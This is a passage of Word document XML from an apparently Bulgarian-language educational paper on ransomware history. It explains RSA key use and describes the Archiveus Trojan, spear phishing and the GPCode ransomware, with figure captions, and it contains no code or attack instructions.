          <w:id w:val="352465324"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="00C06BE8">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00C06BE8">
            <w:instrText xml:space="preserve"> CITATION arc \l 1026 </w:instrText>
          </w:r>
          <w:r w:rsidR="00C06BE8">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00823414" w:rsidRPr="00823414">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[4]</w:t>
          </w:r>
          <w:r w:rsidR="00C06BE8">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
    </w:p>
    <w:p w14:paraId="0642BF7D" w14:textId="77777777" w:rsidR="008874DA" w:rsidRDefault="00E31DE8" w:rsidP="008874DA">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="429C79E7" wp14:editId="07FD603F">
            <wp:extent cx="5760720" cy="2701290"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="1720905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0D6CF" w14:textId="265E350E" w:rsidR="00E31DE8" w:rsidRPr="008874DA" w:rsidRDefault="008874DA" w:rsidP="008874DA">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc223382608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</w:t>
      </w:r>
      <w:r w:rsidR="00800816">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="008874DA">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>А</w:t>
      </w:r>
      <w:r w:rsidRPr="00366161">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">рхитектура на </w:t>
      </w:r>
      <w:r w:rsidRPr="00366161">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>RSA</w:t>
      </w:r>
      <w:r w:rsidRPr="00366161">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> криптиране</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p w14:paraId="52DD8A3B" w14:textId="29425BD3" w:rsidR="00E31DE8" w:rsidRPr="008874DA" w:rsidRDefault="00E31DE8" w:rsidP="00366161">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="180CDAC5" w14:textId="53774ADF" w:rsidR="00E31DE8" w:rsidRDefault="00E31DE8" w:rsidP="0051454C">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="708"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Алгоритъмът използва два ключа, </w:t>
      </w:r>
      <w:r w:rsidR="009C6F73">
        <w:t>чрез</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> които се криптира и декриптира информация. </w:t>
      </w:r>
      <w:r w:rsidRPr="0037494B">
        <w:t>Основната идея е</w:t>
      </w:r>
      <w:r w:rsidR="009C6F73">
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="0037494B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009C6F73">
        <w:t>разполагайки с</w:t>
      </w:r>
      <w:r w:rsidRPr="0037494B">
        <w:t xml:space="preserve"> единия ключ да е </w:t>
      </w:r>
      <w:r w:rsidR="009C6F73" w:rsidRPr="009C6F73">
        <w:t xml:space="preserve">много трудно </w:t>
      </w:r>
      <w:r w:rsidRPr="0037494B">
        <w:t>математически да бъде изчислен какъв е другия</w:t>
      </w:r>
      <w:r w:rsidR="009C6F73">
        <w:t>т</w:t>
      </w:r>
      <w:r w:rsidRPr="0037494B">
        <w:t>. По този начин става възможно свободно</w:t>
      </w:r>
      <w:r>
        <w:t>то използван</w:t>
      </w:r>
      <w:r w:rsidR="009C6F73">
        <w:t>е</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> на</w:t>
      </w:r>
      <w:r w:rsidRPr="0037494B">
        <w:t xml:space="preserve"> единия от ключовете като "публичен"</w:t>
      </w:r>
      <w:r>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="0037494B">
        <w:t xml:space="preserve"> а другия</w:t>
      </w:r>
      <w:r w:rsidR="009C6F73">
        <w:t>т</w:t>
      </w:r>
      <w:r w:rsidRPr="0037494B">
        <w:t xml:space="preserve"> да остане "таен" (само собственик</w:t>
      </w:r>
      <w:r w:rsidR="009C6F73">
        <w:t>ът</w:t>
      </w:r>
      <w:r w:rsidRPr="0037494B">
        <w:t xml:space="preserve"> го притежава и никой друг не може в разумно време да го намери).</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009C6F73">
        <w:t xml:space="preserve">В конкретния случай </w:t>
      </w:r>
      <w:r w:rsidR="00CC27C0">
        <w:t>х</w:t>
      </w:r>
      <w:r>
        <w:t>акерът</w:t>
      </w:r>
      <w:r w:rsidR="00CC27C0">
        <w:t xml:space="preserve"> играе роля на собственик, който </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">притежава частния </w:t>
      </w:r>
      <w:r w:rsidR="009C6F73" w:rsidRPr="0037494B">
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="009C6F73">
        <w:t>тайния</w:t>
      </w:r>
      <w:r w:rsidR="009C6F73" w:rsidRPr="0037494B">
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="009C6F73">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>ключ.</w:t>
      </w:r>
      <w:r w:rsidRPr="00097ECD">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>На практика ф</w:t>
      </w:r>
      <w:r w:rsidRPr="00097ECD">
        <w:t>айловете се криптират по начин, който не позволява възстановяване без заплащане на откуп</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00C06BE8">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="389242632"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="00C06BE8">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00C06BE8">
            <w:instrText xml:space="preserve"> CITATION Фил20 \l 1026 </w:instrText>
          </w:r>
          <w:r w:rsidR="00C06BE8">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00823414" w:rsidRPr="00823414">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[5]</w:t>
          </w:r>
          <w:r w:rsidR="00C06BE8">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="-980772652"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="00962853">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00962853">
            <w:instrText xml:space="preserve"> CITATION Wha25 \l 1026 </w:instrText>
          </w:r>
          <w:r w:rsidR="00962853">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00823414">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00823414" w:rsidRPr="00823414">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[6]</w:t>
          </w:r>
          <w:r w:rsidR="00962853">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
    </w:p>
    <w:p w14:paraId="610D87AB" w14:textId="6B5E2259" w:rsidR="0051454C" w:rsidRPr="00794A33" w:rsidRDefault="00E31DE8" w:rsidP="0051454C">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00F748AE">
        <w:t>„</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Archiveus</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Trojan</w:t>
      </w:r>
      <w:r w:rsidR="00F748AE">
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="0051454C">
        <w:t xml:space="preserve"> криптира всичко в </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0051454C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>MyDocuments</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0051454C">
        <w:t xml:space="preserve"> директорията (фиг. </w:t>
      </w:r>
      <w:r w:rsidR="00CC27C0">
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="0051454C">
        <w:t>) и изисква от потърпевшия да закупи артикули от онлайн аптека, в замяна ще получи 30 символен код, за да възстанови всичките си файлове.</w:t>
      </w:r>
      <w:r w:rsidR="00794A33">
        <w:t xml:space="preserve"> Известен „недостатък“ на вируса е</w:t>
      </w:r>
      <w:r w:rsidR="00CC27C0">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00794A33">
        <w:t xml:space="preserve"> че дори </w:t>
      </w:r>
      <w:r w:rsidR="00CC27C0">
        <w:t>пострадалият</w:t>
      </w:r>
      <w:r w:rsidR="00794A33">
        <w:t xml:space="preserve"> да заплати откупа</w:t>
      </w:r>
      <w:r w:rsidR="00613567">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00794A33">
        <w:t xml:space="preserve"> някои от файловете остават </w:t>
      </w:r>
      <w:r w:rsidR="00CC27C0">
        <w:t>безвъзвратно увредени</w:t>
      </w:r>
      <w:r w:rsidR="00794A33">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="2064139832"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="00C06BE8">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00C06BE8">
            <w:instrText xml:space="preserve"> CITATION arc \l 1026 </w:instrText>
          </w:r>
          <w:r w:rsidR="00C06BE8">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00823414" w:rsidRPr="00823414">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[4]</w:t>
          </w:r>
          <w:r w:rsidR="00C06BE8">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
    </w:p>
    <w:p w14:paraId="062DAAC6" w14:textId="77777777" w:rsidR="0051454C" w:rsidRDefault="0051454C">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4777B6D8" w14:textId="77777777" w:rsidR="008874DA" w:rsidRDefault="0051454C" w:rsidP="008874DA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32E7F09A" wp14:editId="28194F6C">
            <wp:extent cx="5760720" cy="3976370"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="180818339" name="Picture 5" descr="Archiveus Trojan ransomware vir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rchiveus Trojan ransomware viru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879D" w14:textId="1C524862" w:rsidR="00E31DE8" w:rsidRPr="008874DA" w:rsidRDefault="008874DA" w:rsidP="008874DA">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc223382609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3</w:t>
      </w:r>
      <w:r w:rsidR="00800816">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00D40C1A">
        <w:t xml:space="preserve">Изглед на </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D40C1A">
        <w:t>Archiveus</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D40C1A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D40C1A">
        <w:t>Trojan</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D40C1A">
        <w:t xml:space="preserve"> вирус</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p w14:paraId="2F4F7599" w14:textId="413654E1" w:rsidR="00A46A8E" w:rsidRPr="00A46A8E" w:rsidRDefault="00743616" w:rsidP="00A46A8E">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DED51E5" w14:textId="39BB4C4F" w:rsidR="00743616" w:rsidRDefault="00A46A8E" w:rsidP="00A46A8E">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Toc224154931"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Spear phishing Ransomware</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p w14:paraId="5DA1DE92" w14:textId="1571D84E" w:rsidR="00A46A8E" w:rsidRDefault="005B0707" w:rsidP="002F7C2D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Spear phishing </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">е вид </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>phishing</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> атака, при която се таргетира точно определен човек, група или организация. </w:t>
      </w:r>
      <w:r w:rsidR="00D2359D">
        <w:t>Ц</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">елта е извличане на лична информация, сваляне и </w:t>
      </w:r>
      <w:r w:rsidR="006D0013">
        <w:t xml:space="preserve">инсталация </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">на вируси или изпращане на определена сума </w:t>
      </w:r>
      <w:r w:rsidR="00D2359D">
        <w:t>до престъпниците</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="009E0C7C">
        <w:t>Те п</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">остигат </w:t>
      </w:r>
      <w:r w:rsidR="003A405B">
        <w:t>целите си</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> чрез изграждане на фалшиви истории или сценарии. </w:t>
      </w:r>
      <w:r w:rsidR="0033715D">
        <w:t>Ф</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ишинг заплахите са прикачени в имейли, социални мрежи, текстови съобщения или телефонни разговори. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Spear phishing </w:t>
      </w:r>
      <w:r>
        <w:t>атак</w:t>
      </w:r>
      <w:r w:rsidR="003A405B">
        <w:t>а</w:t>
      </w:r>
      <w:r>
        <w:t>т</w:t>
      </w:r>
      <w:r w:rsidR="003A405B">
        <w:t>а</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> е най-ефективната форма на атака, понеже измамата е пригодена да бъде максимално убедителна за конкретно лице.</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="978656913"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="00C06BE8">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00C06BE8">
            <w:instrText xml:space="preserve"> CITATION Spe \l 1026 </w:instrText>
          </w:r>
          <w:r w:rsidR="00C06BE8">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00823414">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00823414" w:rsidRPr="00823414">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[7]</w:t>
          </w:r>
          <w:r w:rsidR="00C06BE8">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
    </w:p>
    <w:p w14:paraId="73766F80" w14:textId="6D4197B7" w:rsidR="003E0712" w:rsidRPr="00BA0B76" w:rsidRDefault="005B0707" w:rsidP="002F7C2D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>През 2006 година се появява първия</w:t>
      </w:r>
      <w:r w:rsidR="003A405B">
        <w:t>т</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">spear phishing ransomware. </w:t>
      </w:r>
      <w:r w:rsidR="001B3E02">
        <w:t>„</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>GPCode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="001B3E02">
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> се разпространява през електронни пощи като прикачен файл под формата на заявление за работа. </w:t>
      </w:r>
      <w:r w:rsidR="003E0712">
        <w:t>Променя се</w:t>
      </w:r>
      <w:r w:rsidR="0033715D">
        <w:t xml:space="preserve"> тапета на десктопа</w:t>
      </w:r>
      <w:r w:rsidR="003E0712">
        <w:t xml:space="preserve">, като </w:t>
      </w:r>
      <w:r w:rsidR="00B87DAA">
        <w:t>визуализира</w:t>
      </w:r>
      <w:r w:rsidR="003E0712">
        <w:t xml:space="preserve"> съобщение, че системата е пробита и е прикачен файл с инструкции (фиг. </w:t>
      </w:r>
      <w:r w:rsidR="0033715D">
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="003E0712">
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r w:rsidR="0033715D">
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidR="003E0712">
        <w:t>).</w:t>
      </w:r>
      <w:r w:rsidR="00C06BE8">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F1E5572" w14:textId="145C311E" w:rsidR="005B0707" w:rsidRPr="002539E6" w:rsidRDefault="00473542" w:rsidP="003E0712">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="360"/>
      </w:pPr>
      <w:r>
        <w:t>По-новите версии (2010 г.)</w:t>
      </w:r>
      <w:r w:rsidR="002F7C2D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidR="005B0707">
        <w:t>зползва</w:t>
      </w:r>
      <w:r>
        <w:t>т</w:t>
      </w:r>
      <w:r w:rsidR="005B0707">
        <w:t xml:space="preserve"> алгоритъм за криптиране </w:t>
      </w:r>
      <w:r w:rsidR="005B0707">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>RSA-1024,</w:t>
      </w:r>
      <w:r w:rsidR="005B0707">
        <w:t xml:space="preserve"> който за времето си е непосилен да бъде разбит чрез</w:t>
      </w:r>
      <w:r w:rsidR="005B0707">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> brute force.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Първите версии на </w:t>
      </w:r>
      <w:r w:rsidR="00D357BC">
        <w:t>„</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>GPCode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00D357BC">
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> използват симетрично криптиране, където </w:t>
      </w:r>
      <w:r w:rsidR="002539E6">
        <w:t xml:space="preserve">ключът за криптиране и декриптиране е един и същ. Друг недостатък на първоначалния </w:t>
      </w:r>
      <w:r w:rsidR="002A38F4">
        <w:t>„</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="002539E6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>G</w:t>
      </w:r>
      <w:r w:rsidR="0033715D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r w:rsidR="002539E6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Code</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="002A38F4">
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="002539E6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002539E6">
        <w:t>е</w:t>
      </w:r>
      <w:r w:rsidR="003A405B">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="002539E6">
        <w:t xml:space="preserve"> че файловете, които се криптират се запазват на нова локация, а некриптираните се изтриват. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="002539E6" w:rsidRPr="00795EDA">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Undeletion</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="002539E6" w:rsidRPr="00795EDA">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> utility</w:t>
      </w:r>
      <w:r w:rsidR="002539E6">
        <w:t xml:space="preserve"> може да възстанови част от файловете.</w:t>
      </w:r>
      <w:r w:rsidR="00C06BE8">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="1496001391"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="00962853">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00962853">
            <w:instrText xml:space="preserve"> CITATION Gpc \l 1026 </w:instrText>
          </w:r>
          <w:r w:rsidR="00962853">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00823414" w:rsidRPr="00823414">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[8]</w:t>
          </w:r>
          <w:r w:rsidR="00962853">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
    </w:p>
    <w:p w14:paraId="76AEAC8C" w14:textId="77777777" w:rsidR="008874DA" w:rsidRDefault="005B0707" w:rsidP="008874DA">
      <w:pPr>
        <w:keepNext/>
        <w:ind w:firstLine="360"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6749C23B" wp14:editId="4273A01E">
            <wp:extent cx="4503288" cy="3443283"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="1636364204" name="Picture 7" descr="GPcode Ransomware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Pcode Ransomware Mess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513" cy="344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1CE0" w14:textId="259DE622" w:rsidR="005B0707" w:rsidRDefault="008874DA" w:rsidP="008874DA">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Toc223382610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4</w:t>
      </w:r>
      <w:r w:rsidR="00800816">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00DB78BD">
        <w:t xml:space="preserve">Пробита система от </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DB78BD">
        <w:t>GPCode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DB78BD">
        <w:t>.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p w14:paraId="25037ECB" w14:textId="1362BE30" w:rsidR="00870315" w:rsidRPr="00366161" w:rsidRDefault="00870315" w:rsidP="00366161">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00366161">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38A86F2F" w14:textId="77777777" w:rsidR="008874DA" w:rsidRDefault="00E26014" w:rsidP="008874DA">
      <w:pPr>
        <w:keepNext/>
        <w:ind w:firstLine="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="57C5B3CC" wp14:editId="19ACAFDC">
            <wp:extent cx="5760720" cy="3472815"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="240144022" name="Picture 8" descr="GPcode Ransomware Instructions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Pcode Ransomware Instructions Exampl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B2C7" w14:textId="55636C0F" w:rsidR="005B0707" w:rsidRDefault="008874DA" w:rsidP="008874DA">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_Toc223382611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5</w:t>
      </w:r>
      <w:r w:rsidR="00800816">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="008D327E">
        <w:t xml:space="preserve">Инструкции за откуп, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008D327E">
        <w:t>GPCode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008D327E">
        <w:t>.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:p w14:paraId="0B759F93" w14:textId="77777777" w:rsidR="00056026" w:rsidRDefault="00056026">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3438E0E3" w14:textId="0DA77029" w:rsidR="00953056" w:rsidRDefault="00056026" w:rsidP="009E4BB6">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
